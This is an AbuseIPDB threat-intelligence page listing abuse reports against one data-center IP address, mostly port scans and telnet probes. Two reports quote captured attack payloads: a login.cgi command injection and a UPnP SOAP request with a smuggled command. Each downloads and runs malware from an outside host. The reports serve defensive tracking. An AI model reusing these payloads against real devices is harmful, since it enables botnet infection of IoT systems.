JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 198.98.53.45

198.98.53.45 was found in our database!

This IP was reported 51 times. Confidence of Abuse is 100%: ?

100%

ISP	FranTech Solutions
Usage Type	Data Center/Web Hosting/Transit
ASN	AS53667
Domain Name	frantech.ca
Country	🇺🇸 United States of America
City	New York City, New York

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 198.98.53.45

Whois 198.98.53.45

IP Abuse Reports for 198.98.53.45:

This IP address has been reported a total of 51 times from 39 distinct sources. 198.98.53.45 was first reported on June 16th 2026, and the most recent report was 11 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 NXTwoThou	2026-06-17 10:58:44 (11 hours ago)	/login.cgi%3Fcli=aa%20aa%27;wget%20http://109.104.153.60/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$	Web App Attack
🇩🇪 KPS	2026-06-17 10:12:31 (12 hours ago)	PortscanM	Port Scan
🇩🇪 Admins@FBN	2026-06-17 10:06:41 (12 hours ago)	FW-PortScan: Traffic Blocked srcport=47060 dstport=23	Port Scan
🇨🇭 SOC [GOLINE SA]	2026-06-17 10:04:01 (12 hours ago)	FortiGate detected IPS attack from IPv4 address 198.98.53.45	Hacking
🇺🇸 SuperCores Hosting	2026-06-17 09:53:50 (12 hours ago)	[2026-06-17 09:53:50.854851] TELNET/23 Unautorized connection, Suspicious Mirai Botnet.	IoT Targeted Brute-Force Hacking Port Scan DDoS Attack
🇺🇸 RAP	2026-06-17 09:46:19 (12 hours ago)	2026-06-17 09:46:19 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 MPL	2026-06-17 09:31:39 (13 hours ago)	tcp/5555	Port Scan
🇳🇱 BIV	2026-06-17 09:18:26 (13 hours ago)	Honeypot multi-source hit. Sources: dshield:cowrie,dshield:fw,tpot:P0f,tpot:Suricata. Ports: 2223,23 ... show more Honeypot multi-source hit. Sources: dshield:cowrie,dshield:fw,tpot:P0f,tpot:Suricata. Ports: 2223,23. Automated tiered (T-Pot+DShield). show less	Port Scan Hacking Brute-Force SSH
🇺🇸 xmission.com	2026-06-17 09:14:05 (13 hours ago)	Blocked by UFW (TCP on 23) Source port: 12135 TTL: 51 Packet length: 44 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 12135 TTL: 51 Packet length: 44 TOS: 0x00 This report (for 198.98.53.45) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇫🇷 pm33	2026-06-17 09:09:09 (13 hours ago)	Probing for resource vulnerabilities HTTP(S)	Web App Attack
🇩🇪 iNetWorker	2026-06-17 09:03:05 (13 hours ago)	trying to access non-authorized port	Port Scan
🇺🇸 MPL	2026-06-17 08:26:37 (14 hours ago)	tcp/23 (3 or more attempts)	Port Scan
🇫🇮 6kilowatti	2026-06-17 07:34:10 (15 hours ago)	2026-06-17T10:34:05.306676+03:00 6kw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:b6:e7:09:78:9a:18 ... show more 2026-06-17T10:34:05.306676+03:00 6kw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:b6:e7:09:78:9a:18:bd:57:7e:08:00 SRC=198.98.53.45 DST=5.61.88.83 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=46964 PROTO=TCP SPT=12135 DPT=23 WINDOW=59066 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇺🇸 xmission.com	2026-06-17 07:32:45 (15 hours ago)	Blocked by UFW (TCP on 23) Source port: 21248 TTL: 51 Packet length: 44 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 21248 TTL: 51 Packet length: 44 TOS: 0x00 This report (for 198.98.53.45) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇬🇧 gbzret4d	2026-06-17 07:09:56 (15 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot

Showing 1 to 15 of 51 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇧🇪 198.235.24.248

🇺🇸 172.236.111.197

🇨🇳 222.186.68.153

🇨🇭 179.43.146.227

🇰🇷 175.198.62.180

🇨🇳 150.255.24.137

🇮🇩 114.10.47.235

🇰🇷 112.162.111.205

🇳🇱 45.148.10.51

🇮🇪 3.254.57.152

🇨🇳 222.188.185.65

🇩🇪 213.209.159.56

🇩🇪 213.209.159.11

🇧🇷 205.210.31.231

🇺🇸 198.89.96.148

🇳🇱 176.65.148.244

🇺🇸 143.42.1.52

🇺🇸 76.185.202.94

🇺🇸 23.137.105.190

🇨🇳 116.135.67.93